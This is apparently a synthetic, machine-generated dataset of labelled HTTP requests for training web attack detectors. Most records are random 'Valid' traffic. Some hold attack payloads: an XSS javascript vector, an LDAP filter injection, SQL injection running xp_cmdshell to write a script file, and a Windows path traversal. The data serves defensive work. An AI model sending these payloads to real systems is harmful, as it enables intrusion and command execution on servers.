If-Range: "6dxFf0F5Cqwo9JmkQ"
Max-Forwards: 892
Pragma: no-cache
Authorization: Digest cnonce="llutiei"
Range: -05
Referer: /Mbln.jpeg
TE: gzip,trailers
User-Agent: Mozilla/1.8 (X11; U; Linux i386 1.7; rA-an; rv:3.5.3) Gecko/55804038
UA-Color: color32
Warning: 290 144.167.27.105:99939 "faiwmhn2Lliv1gynD" "Thu, 27 Dec 07 16:10:00 GMT"
X-Serial-Number: 39752722900840058
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

fOanhgaqt25tT=674653950&oniyiaRqsyl=61446741&are4slwgTltIach=67691&fshljr=aR8h&epqw0sa7iiqq2h=63788595&hsipbuKwi=odeutewv&enpivsI8eectuie=8ew +&includeK_6Q3=a7re53z&SxEx755A=577976&dhgIsu7vjbc=ajd1ibutja&voemyli7eaIhvml=al5a=etAEgxilreH&mmaecatrHqs=t]sgpt3? ad1dZt&to&irrihUeilekhozi=027038692&agrwbogFeDrsa6s=05&iecTetstaooj0=683

End - Id: 39842
Start - Id: 15982
class: Valid
GET /iiuwpaTalheYtn/iiaetddDhs/a0dadteei1tlelOie/oMzW0Jc@/e-AnqhB1SaD_MM6LpfTn/@At/tfAX5h0_zz/-Sxp_lt1DnfTFaWt.gif?ysc3sAhcusNql=820&ed=9obRTaoor1ae2&pSHh=8970&Irt7cehlls=Oe6n HTTP/1.1
Host: www.Ndhssu.it
Connection: close
Accept: image/jpeg;q=0.1, video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=23
Client-ip: 31.122.98.168
Cookie: ea=ecde]e iu @wxu>yitbetweene
Cookie2: $Version="79"
Date: Thu, 08 May 08 07:19:35 UTC
ETag: ".Bv@UTeq1ecGMZfx"
Expect: iaaznme
From: e5ronmv@tbi8tnN.gov
If-Modified-Since: Wed, 04 Jul 07 23:35:13 UTC
If-Unmodified-Since: Fri, 26 Mar 04 06:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Dec 08 08:10:57 GMT
Max-Forwards: 288
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM bkRwaHVlU3VvYXV4dWhuaHRvOHRhcmdTb3hoY2VuaWVuc2E=
Authorization: Digest opaque="shaeseN"
Range: 818-1,-66
Referer: http://zeaoepe.com/lm0dmt.pl
TE: deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/8.1 (compatible; Ittvtuel; Open BSD i386; pantdgnrl)
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1814x7324
Via: 3.0 90.111.70.3:1055
Transfer-Encoding: compress
Upgrade: di6ty/0.9, I5w/8.3
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 18.38.33.49
X-Serial-Number: 606819653
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15982
Start - Id: 25656
class: Valid
GET /eA7b48PaG8WJf/klaslaoltyruhatomt/u3TQd/-0HMqC/U4.JTGSCoqOWaNw.shtml?mdqpndngi=8&cq=393763&PrRz=execeH+a&nrpoTtaooubhU=38&O9UXW04KVg=en_EdswrRyg&Oaeessa5s=6150016858&tIuesnaoswmo=qL7eyt&netectnrdJat=+xooi2n%5Coxtermel&ahoevsy0=ru5hci+s&lsdodyuEthhu=etesqOoisrtIur&lbGat=o6eerut+tes1c+a%27q1he&XxmlacceptgFpNMD=ua+e&fjiOwaamhu=selectn9oilrm%3Dic%3Bodrop&bhtItleh8ans=f1ooqjnnsaDyctTisr HTTP/1.1
Host: 84.123.54.206:80
Connection: htpoffeh
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.112.170.136
Cookie: h0dpImrddh=|htacces8EpHoxtermd~ihmoj< ;tki4ai=70247656;oeaiEiR9uiasd=6193191;iabykvn='|kgi;.j0Z=wb
Cookie2: $Version="0"
Date: Thu, 01 Nov 07 08:18:55 UTC
ETag: "JpIsxO9C.2s@pCWOu21"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Thu, 16 Sep 04 01:47:59 CET
If-Unmodified-Since: Mon, 27 Aug 07 22:29:13 GMT
If-Match: *
If-None-Match: "cgQxMe9KaOU3MrsDZW"
If-Range: Wed, 13 Sep 06 04:39:32 GMT
Max-Forwards: 390
MIME-Version: 6.2
Pragma: Ixjwtak=wlaLNA
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: -55
Referer: /eseeerN/ceia/eeztd/ia1yaww/ptin.tiff
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 9.1; it-e4; rv:0.5.7) Gecko/72666965
UA-CPU: Sparc
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: FTP/6.4 174.168.181.78, 1.8 68.43.123.245, 9.0 126.131.146.128:99666
Transfer-Encoding: gzip
Upgrade: oyo8/5.6
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25656
Start - Id: 46866
class: XSS
POST /naHq/Yo26dpt.msf? HTTP/1.1
Content-Length: 170
Content-Language: uqmpt,ihe,o
Content-Encoding: deflate
Content-Location: /nY9Iir.shtml
Content-MD5: b2ExcnR1bXQxYW10ZWhybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Fri, 03 Nov 06 09:37:23 CET
Host: 181.141.247.70
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: rlndl5=ioh
Client-ip: 212.45.149.159
Cookie: nmaiaol1tn=7365;seen=t;kue9i=nSfsCqgjG
Cookie2: $Version="7"
Date: Thu, 27 Nov 08 15:37:31 UTC
ETag: "ynNtDqxUiypefBzDU"
Expect: 100-continue
From: Adtwe7be@o8Kit.ch
If-Modified-Since: Tue, 03 Feb 04 16:38:02 CET
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "Z_2PyHiv3JhHR73_N"
If-Range: Mon, 13 Sep 04 08:24:42 CET
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: leSx ikmsmN=tmSeI0ah
Range: 6262-,10870-70169
Referer: /6tecob/Odrledb/abtef.asmx
TE: deflate,gzip;q=0.3
Trailer: Via
User-Agent: msdrs8stg
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 2.9 www.ieand3ra.png, 2.5 www.n29oG.jpeg
Transfer-Encoding: eh1ekT; eniNhsf=nc61l
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

rsvno=@yee&tctCn7i04peyois=sbF6x&8nemnltg=3fteviuitnBnetlfe&ishshpd2trlqsiu=<bgsound    src   =   "     javascript: [alert ('e3sn');]    "   >

End - Id: 46866
Start - Id: 37323
class: LdapInjection
GET /lEefYqL@F8Xdq3Gxg1/7_Mland1Lp/hOJNRmn/ttbt9vt2e/dJJz/gZMY7X0EhJ53/qXG16/eiieceHvyuqrTr.pl?9tcfmcnhn=4677&YxbgsoundV3cjAahttpsA1=%2Ff7ctupdatehaso&tjpade5hsheE79g=o%27k9m+ie+0d%2F%28+%3Fyrew&0nDgao=t-bees9&dpitBzTfeNIu=pT&XKPZ=qMoOdxG&reeo2rtjn51=49854323&g61rt8=981201173&ahdenMnv=370209&ieeftOriioaii=Tmenge&EUps4JupdatescriptYpXg=fNuz&oTiunc=rPNE0XR HTTP/1.1
Host: 88.75.28.66
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: )   (   |   (displayName=had*)(name=had*    )(    mail=had*    )
Accept-Language: Teets-t5e, sioxl-d;q=0.6, n7-g, nmh3-srcrq;q=0.1
Cache-Control: min-fresh=55
Client-ip: 68.215.146.126
Cookie: otasqwssmH9t=731
Cookie2: $Version="395"
Date: Sat, 30 Sep 06 19:53:58 UTC
ETag: "tNRtwBtN7DVCxJ6CbgXF"
Expect: w3ene=oyyhtsy;atlc
From: rtec@se2cehaQn.com
If-Modified-Since: Sat, 17 Jan 09 12:46:10 CET
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: "b7tJ-K7x8cRXLvUwUR"
If-None-Match: *
If-Range: Fri, 26 Feb 10 13:48:16 CET
Max-Forwards: 18
MIME-Version: 6.7
Pragma: rreohT=uIkooitg
Proxy-Authorization: NTLM aWgzbmF0aXNlZnNlcjlodG1hdGxtU3IycnRsZWFPTjdibms=
Authorization: NTLM ZWFvbFN0dFJNYzBqcmUyM2x0ZXR1cm50bzRDYTluZEZuZWVjeWY=
Range: 1-568088,6956-8,075-
Referer: http://modndi3c.it/v1OLo0o/ssihdi/olai/5riea/fdotW7tT.shtml
TE: gzip;q=0.7,trailers,trailers
Trailer: Host
User-Agent: Drohqlhtdowa3dora
UA-CPU: StrongARM
UA-Disp: 2661,0577,16
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: identity
Upgrade: wnnr/5.6, rfetYt/6.7
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37323
Start - Id: 1842
class: Valid
GET /emyei/gc6etiu1sxituinnTOri.css?dmbtpilh=yAi&bpHzsax=lencumzh7at&1hrmtcxasoAvg=rn&baLStbldtpEnT=hntsehcs+x&2p=+E6h4ilallhnC+&ehhRs=wZ6-AMrpEf HTTP/1.1
Host: www.nsBnln.it:672
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: koi8;q=0.9, iso-8859-7;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 76.195.99.9
Cookie: Rlelax5MH2X9=HeTitausre ;U7from7Eformp00dI.G=lkjZUtp1qYXe
Cookie2: $Version="678"
Date: Tue, 12 Feb 08 08:50:57 CET
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Sun, 22 May 05 10:16:19 GMT
If-Unmodified-Since: Thu, 20 Sep 07 18:52:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 4
MIME-Version: 7.5
Pragma: Oauhha=aU
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM aWl3ZnJhanRub2xndG1raDBFUmVpdXI1aWVobmFUYWl6dA==
Range: -34624,61390-055,75119-
Referer: http://www.Ojczi.org/5aoaulon/Nmbi8l/ssqryseO.asmx
TE: gzip;q=0.9,trailers,trailers
Trailer: User-Agent
User-Agent: TettbRyaanlupauen1jn
UA-CPU: x86
UA-Disp: 131,0628,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 286x332
Via: 2.8 5.105.8.49:4906, FTP/3.1 190.242.19.240
Transfer-Encoding: deflate
Upgrade: pxiaC3/3.8, ite/3.5
Warning: 928 www.t0i0ol.js:2 "btetestt" 
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 732644687
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1842
Start - Id: 4614
class: Valid
PUT /hsgdtshrwoevreFmO/rMdZXmIZ53QBzlmS0_O/nrW4fF0GS.aEe8ggmBQ/ohor6Rutosgsdnlnw/lnn7iBeyntaeys5ezaly.htm? HTTP/1.0
Content-Length: 19
Content-Language: n1balil
Content-Encoding: deflate
Content-Location: http://www.fDlenih.st/omtwy.nsf
Content-MD5: aWlyZWVubGFodGVlc2lydA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Apr 07 03:21:09 GMT
Last-Modified: Tue, 06 Jan 09 13:29:04 CET
Host: www.heTfhomte.de:168
Connection: 0rir
Accept: */*
Accept-Charset: windows-1254;q=0.3, x-mac-arabic, x-mac-hebrew, iso-8859-1, iso-10646-ucs-2;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: max-stale=84638
Client-ip: 106.70.84.133
Cookie: nhu62Soto=6;ZtjGqDlocationm8Rlc=6546
Cookie2: $Version="256"
Date: Fri, 19 Aug 05 14:35:11 UTC
ETag: "sg@ihNTuVOy75ZcaHms"
Expect: 100-continue
From: acjzno@3gxnNel.fr
If-Modified-Since: Sun, 24 May 09 05:19:19 CET
If-Unmodified-Since: Tue, 29 May 07 05:08:52 CET
If-Match: "8lgF-3pOBeXxM@GG"
If-None-Match: "tGZ5ZYZIj5FaN4Yc0aB"
If-Range: "B0PV5Fi7ejdj_I0"
Max-Forwards: 29
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bmF5bjcxZzpoSXJybmVv
Authorization: Basic c2F0bjc6dGV0aXNl
Range: -0,-2986,-51980
Referer: /dKitod/ehjoR9s/df9e/voue.nsf
TE: trailers,deflate,deflate;q=0.1
Trailer: If-None-Match
User-Agent: shasMoaS5eict
UA-CPU: Sparc
UA-Disp: 183,1102,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 834x094
Via: 6.5 www.czdnreoa.jpg, 0.9 www.osmiI.html:133, HTTP/7.3 www.n0Aztn.shtml
Transfer-Encoding: gzip
Upgrade: frylcn/4.6, st0tb/5.0, iRO/3.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

neameiryyn=idesroea

End - Id: 4614
Start - Id: 16982
class: Valid
GET /tsqWuM8/rN7fUoysio3niftd/e8oewn/CUcYVftaGS_BhttpsPw/EirOp_@osystemqiVvx/tdy1/4gh5gNpzbiJnuX69-uI/ic.mspx?naterfdtiT8=scttswemy+w&dthe=%24ho+t&-9includez2Kd3=sH&xOyrrqeoky=yshoeex0ai2genhr HTTP/1.0
Host: 6.158.59.202
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 255.91.47.160
Cookie: yi=245046965;s1=iazU1l;64ghavingrHf=aOGEEb;ZnjD=b6E;auii83ei=iwrogiNilrmet
Cookie2: $Version="72"
Date: Sat, 23 Jan 10 11:53:37 UTC
ETag: "L3sTip.hI8HQ1AYfMBWA"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Tue, 16 Jun 09 03:30:29 CET
If-Unmodified-Since: Sun, 26 Feb 06 15:48:08 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 18:01:35 CET
Max-Forwards: 55
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: 17583-
Referer: http://www.teo0afOm.biz/a0vk/9eie/aeseoi/6emA.sh
TE: trailers
Trailer: Date
User-Agent: yrbaep4boR24CfwrtiTa
UA-CPU: 68000
UA-Disp: 287,215,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 366x7717
Via: HTTP/4.6 101.104.181.247, 9.5 www.Ltso.gif, tnbzi/1.8 www.Ermo.js
Transfer-Encoding: identity
Upgrade: Tt2oaj/5.0, oi4aqT/2.5
Warning: 325 113.145.246.23:44456 "TcfseuxEeh6hlbirt" 
X-Forwarded-For: 86.116.223.77
X-Serial-Number: 44944819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16982
Start - Id: 11389
class: Valid
GET /hoeeasxloea/oPq/tSF/rAh/s_16HEs/CRnk-8/dropJadropw2TsamS.html?do0z4=i-__I&daac=nEt&a0s=feMjmzeboe37nui&ou4aw=ddNierrdh%7Cs6at&libtmpO_Ua=wiiaccess_logbl&hla=29931&msuwn6udueti=494010719&tmsaeu8en=4Robe&e0=eai9ftpli&eWCl=yperl%40ng3tonap%5Beo+yeH&e0pusrePrriNus=67093&Egn8nwu=%7C%2BhotuedocumentreeT+&2nhtdgns3=798673 HTTP/1.1
Host: 250.88.18.207
Connection: ntns
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 234.227.187.24
Cookie: pUlyrca0eOhy=i]eM;wta8ca9ieOqip=621;e7nrlda=i;lsnullhXQnTFbm4j=06626401;Ctm0s9lie=aperlbetweennaop sst8h@s[ef
Cookie2: $Version="05"
Date: Sun, 23 Oct 05 16:09:02 CET
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: ehbaset
From: snso@neess.uk
If-Modified-Since: Tue, 21 Feb 06 02:07:34 GMT
If-Unmodified-Since: Thu, 14 Jun 07 01:31:27 UTC
If-Match: "L0nFTa@nF7Vv-0-2y"
If-None-Match: "HTALRNuqiOnUnSGqK"
If-Range: Thu, 10 Jul 08 14:06:37 GMT
Max-Forwards: 93
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM bnc2bzNrTndFZGE0aW94cm5zZk5nNGVhZWV0aHB0c2xyb29qb3lhMg==
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 53554-,0954-67,-51599
Referer: /sx0g.wav
TE: deflate,trailers,gzip;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (Windows; U; Win98 3.4; a0-xd; rv:6.8.9) Gecko/16432562
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 988x4080
Via: 5.4 74.77.146.239:9, 0.2 www.tehfy.htm
Transfer-Encoding: identity
Upgrade: r39rn/5.6, eeophz/8.8, 1tanom/6.3, joGerm/3.2, oStM/2.6
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 119.251.177.187
X-Serial-Number: 44542965247814892
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11389
Start - Id: 33415
class: Valid
POST /gJR/KopxL47Fbexec/is.nsf? HTTP/1.0
Content-Length: 279
Content-Language: ece,nri,rdlocylo
Content-Encoding: compress
Content-Location: /tNlnb/eauc/eReqt2/oaie.html
Content-MD5: b3VsT2RlOWV4a0xpMFQ4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Apr 10 19:21:15 UTC
Last-Modified: Mon, 23 Feb 09 12:01:36 UTC
Host: www.caoctaht.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: Clynvt-sdm50orm;q=0.1, rfnctsHE-pon;q=0.8, snuphe-tgmoeai, hMee-c1eiDgan, nNnaien-ohjepwig;q=0.1
Cache-Control: only-if-cached
Client-ip: 176.30.127.43
Cookie: 95Z_lH.IcHp=925614;en=Odg?oAadud8di
Cookie2: $Version="47"
Date: Tue, 06 Apr 10 24:28:07 CET
ETag: W/"60IDLh3ofRYVDqXC"
Expect: ityaa6uE=7efl
From: ooydtlh@tuohEicue.de
If-Modified-Since: Mon, 29 Mar 10 01:59:40 GMT
If-Unmodified-Since: Thu, 26 Feb 04 20:04:57 GMT
If-Match: "Bc@2LQ8AgmR@kKr0v"
If-None-Match: "fwhnwJC5a5tctPFdlhV"
If-Range: "7xmJkT_ikb9I2OlfErO"
Max-Forwards: 17
MIME-Version: 6.1
Pragma: i96l='tfloa'
Proxy-Authorization: nu9hs uajtVt=hdo1
Authorization: RBaU aann=stdeetn
Range: -45727
Referer: http://www.eepi.net/ylsozt/ko8ar7b.htm
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/5.5 (Windows; U; Win98 9.7; Ri-oe; rv:0.0.5) Gecko/86783301
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: FTP/0.5 www.1i6utc.tiff, gea/3.0 www.etrtccdl.html, FTP/9.5 www.rnwa.css
Transfer-Encoding: deflate
Upgrade: o1eNnI/9.9, nAaet/1.1, unnto/0.9, tcEs/9.5
Warning: 647 164.77.60.132 "hnhznlfessi6tA" "Sun, 14 Feb 10 03:58:44 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

l31IXXCUw.l=nscriptd@e5xbse?connect>hsipi&0en4lu=layiOHAi4&Rvro8Rdss=oiaerd>Qtbtrgn;sa~y7&eeejntLrsa=799&d6elt=t5II&wmHer0=rohgtthav $R&emNtlpen4tconiE=2405702128&teceurs8aEzez6e=1880&ahounndanheieQ=4205245&iwbo=He=D&oof55npositionAK1PK=v5nph-4&senb0bon2srmiec=Yt

End - Id: 33415
Start - Id: 41089
class: SqlInjection
GET /hd14mio/.Q0/BftpPlw6Y/t@rr.tiff?art=Bi%3Ba7&mtoeskoyazeeiQ=exec++xp_cmdshell+++++%27%22shs0tl%22+++%3E%3E+++++script.vbs%27&dNnor1cSh=ona5%3A&yLdjuinzdeh8S=Am6qU&1zinio3ih=%25idtsqEasias8%7E&ihssit=pf&reC2ono=573378 HTTP/1.0
Host: www.rstihndoil.org
Connection: h1df1Y
Accept: text/*;q=0.8
Accept-Charset: macintosh, euc-cn, x-mac-ce
Accept-Encoding: gzip;q=0.9, deflate, deflate, identity
Accept-Language: etplv-ieqzhlyu, ofoha-ry, oseoatef-ne;q=0.5
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="0"
Date: Thu, 26 Mar 09 05:06:37 CET
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Fri, 21 Dec 07 09:48:07 GMT
If-Unmodified-Since: Wed, 19 Oct 05 07:43:59 CET
If-Match: "2O7TMQWlB4Qer2PEazSl"
If-None-Match: *
If-Range: Thu, 03 Nov 05 17:30:46 GMT
Max-Forwards: 83
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://3EtmIdfm.net/ltcpw0En/m3p3z/yure/Ioeno/d8dte.jsp
TE: chunked;q=0.7,deflate,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/0.7 (X11; U; Linux i586 7.4; ld-mi; rv:1.2.5) Gecko/33572253
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/9.5 www.lsey.js, HTTP/6.7 137.59.172.118:482
Transfer-Encoding: identity
Upgrade: tuems/4.8, nyAo/8.5, ytngoe/0.7, sai/1.7, 0eeagy/5.6
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41089
Start - Id: 36152
class: PathTransversal
GET /eu4XN.cETjEDJ7uNvmYe/um/dexnr23.shtml?3w5obAt5ot=tjQEmhe6C&liif8Cl=zhTu&TtudrsaiEs=i6goeeo&aohpn3isteNvt=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&tAniysese=sa&nNnaprissett=rshcwrv8&aeoc9uuos9hdN=eryso&egr5teexuXehroe=m5r6pL&Oh=eNcbo%40S3A HTTP/1.1
Host: 108.100.214.251
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: rieTis3-s1X, xE-hz;q=0.1, stsntn-d5hhr, e-hfieeeL;q=0.1
Cache-Control: no-store
Client-ip: 52.138.136.254
Cookie: a7Mbtdoyo=Fskes
Cookie2: $Version="9"
Date: Mon, 26 Jan 09 19:08:46 CET
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: etoihr
From: aitunw@tegatgpn.uk
If-Modified-Since: Mon, 24 Jan 05 21:29:25 CET
If-Unmodified-Since: Mon, 16 Feb 04 22:03:01 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Oct 09 15:54:17 CET
Max-Forwards: 3336
MIME-Version: 6.8
Pragma: eIef8=sce
Proxy-Authorization: Basic eWl1NWVlZTpIc3NkYWE=
Authorization: telnw9 sDavlYt=vHaut
Range: 375-
Referer: http://smga.gov/lyoyIA/rvirbTk/snbhx/nn0edt/iNnceSmh.txt
TE: gzip;q=0.6,trailers
Trailer: Expect
User-Agent: Mozilla/4.4 (Windows; U; Win98 1.8; ut-am; rv:8.4.6) Gecko/23630742
UA-CPU: PowerPC
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9880x9117
Via: HTTP/8.5 207.201.75.115, ie15/3.9 www.xfss.jpg:4
Transfer-Encoding: deflate
Upgrade: bhte/9.7, rertro/9.5
Warning: 211 www.cnett.htm "eObeoNe1e" "Sun, 12 Jun 05 24:16:59 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36152
Start - Id: 21950
class: Valid
GET /3XuEHO6jfRPX2Q./vaaOtsnlyi/hoTqwK@uTT-/9VwmIe/tadthtte/k5or2owEv/a2NS.php?43vb7leetmn=tK.CAC1J&1dJCpH.G0=280263 HTTP/1.1
Host: www.9ocSdaetd.it
Connection: close
Accept: text/plain, image/*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.5, gzip
Accept-Language: *;q=0.5
Cache-Control: min-fresh=81994
Client-ip: 191.101.191.71
Cookie: mol=ovAftadsooTn;0yefuqwinof=objectt$bo;LIpxO2q9ZVS=a-Nb@LER;Ns0hLcssfaoovpo=h9WiiXnaofrrwm
Cookie2: $Version="04"
Date: Mon, 20 Nov 06 08:42:02 GMT
ETag: "OiTKmqB.71.LDMuoID"
Expect: 100-continue
From: slg5eH@arfeenAeg.net
If-Modified-Since: Thu, 02 Oct 08 11:00:19 CET
If-Unmodified-Since: Wed, 30 Nov 05 13:10:51 UTC
If-Match: "XgPNKlJ3TJA1ydkIL"
If-None-Match: "er3mw50cx-VPnJzSxD"
If-Range: Thu, 01 Jan 09 08:41:39 UTC
Max-Forwards: 1
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Digest username="twads"
Range: 81-3452
Referer: /Tiuba/nwka0axn/tar5/BEksi8d.css
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 8.7; re-jn; rv:8.1.2) Gecko/00362047
UA-CPU: x86
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 501x9134
Via: 3.1 95.103.80.107, HTTP/9.1 54.98.133.52:665, 8.1 www.ueimm.shtml
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 20.222.130.202
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21950
Start - Id: 41101
class: SqlInjection
GET /h9rLhpwHOVeo/fhnwt7ofafp0Kyeyam/sdFBjAWB0dzswPfBD/rVys.QvWkHI/NeiaeTaetr/ntee85ro/e6se1oben/06da9xm0ut/dN/ilkecusrysbsfo8oentr/Ni.delete7-OMVA2vKD.mspx?bx=exec+xp_cmdshell+++%27%22awt7mhhs%22++++%3E%3E+++script.vbs%27 HTTP/1.0
Host: www.phqoshuut.org:80
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: dR5-ocefhud;q=0.4, pe-shre;q=0.5, 3g-m99rf, h8rdAc-fEaig;q=0.2
Cache-Control: min-fresh=930
Client-ip: 26.15.87.96
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Thu, 18 Oct 07 03:30:25 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Wed, 20 Jan 10 15:20:26 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 26 May 08 06:31:08 CET
Max-Forwards: 684
MIME-Version: 5.4
Pragma: no-cache
